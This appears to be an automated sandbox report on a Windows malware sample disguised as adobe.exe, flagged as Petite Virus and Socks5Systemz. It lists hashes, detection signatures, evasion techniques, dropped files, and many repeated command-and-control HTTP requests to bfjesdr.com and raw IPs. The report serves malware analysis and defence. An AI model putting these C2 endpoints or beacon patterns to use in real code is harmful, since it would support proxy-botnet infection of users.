Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
adobe.exe

Overview

General Information

Sample name:adobe.exe
Analysis ID:1374165
MD5:e9a2997ee4cfb48cb3988f3048e041e9
SHA1:303d4cb34333e085c47ec565a25abcfa2376db6e
SHA256:6b05ea2717ccbe9837f6b5108900f96c169d9e252b595ddfec97b071fb67dcae
Tags:exeSocks5Systemz
Infos:

Detection

Petite Virus, Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Yara detected Petite Virus
Yara detected Socks5Systemz
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
PE file has nameless sections
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • adobe.exe (PID: 7300 cmdline: C:\Users\user\Desktop\adobe.exe MD5: E9A2997EE4CFB48CB3988F3048E041E9)
    • adobe.tmp (PID: 7320 cmdline: "C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp" /SL5="$20466,4603715,54272,C:\Users\user\Desktop\adobe.exe" MD5: EAF0354C6EA59246416F73EC28FB11AF)
      • aviformattertool.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -i MD5: 354540FAD1E406C119F19FC2499E892C)
      • aviformattertool.exe (PID: 7388 cmdline: "C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -s MD5: 354540FAD1E406C119F19FC2499E892C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TA1T4.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
    C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-ETIM8.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
      C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G2Q7A.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-SD2K4.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000003.00000002.2904685361.00000000009DF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
            00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
              Process Memory Space: aviformattertool.exe PID: 7388JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: adobe.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14Avira URL Cloud: Label: malware
                Source: http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874fAvira URL Cloud: Label: malware
                Source: http://185.196.8.22/nqAvira URL Cloud: Label: malware
                Machine Learning detection for dropped file
                Source: C:\ProgramData\JSON Nested Objects 66\JSON Nested Objects 66.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0045C9A8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045C9A8
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0045CA5C ArcFourCrypt,1_2_0045CA5C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0045CA74 ArcFourCrypt,1_2_0045CA74
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeUnpacked PE file: 2.2.aviformattertool.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeUnpacked PE file: 3.2.aviformattertool.exe.400000.0.unpack
                Source: adobe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-R0SOB.tmp.1.dr
                Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: adobe.tmp, 00000001.00000002.2904468325.000000000072E000.00000004.00000020.00020000.00000000.sdmp, adobe.tmp, 00000001.00000003.1648820462.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, adobe.tmp, 00000001.00000002.2904768508.0000000002313000.00000002.00000001.01000000.00000006.sdmp, adobe.tmp, 00000001.00000003.1648885833.0000000002348000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00474078 FindFirstFileA,FindNextFileA,FindClose,1_2_00474078
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004520D0 FindFirstFileA,GetLastError,1_2_004520D0
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0049676C FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_0049676C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00463504 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463504
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00463980 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463980
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00461F78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461F78
                Source: global trafficTCP traffic: 192.168.2.4:49736 -> 65.109.80.185:2023
                Source: Joe Sandbox ViewIP Address: 185.196.8.22 185.196.8.22
                Source: Joe Sandbox ViewIP Address: 65.109.80.185 65.109.80.185
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608efa10c2ec9c9d3c HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
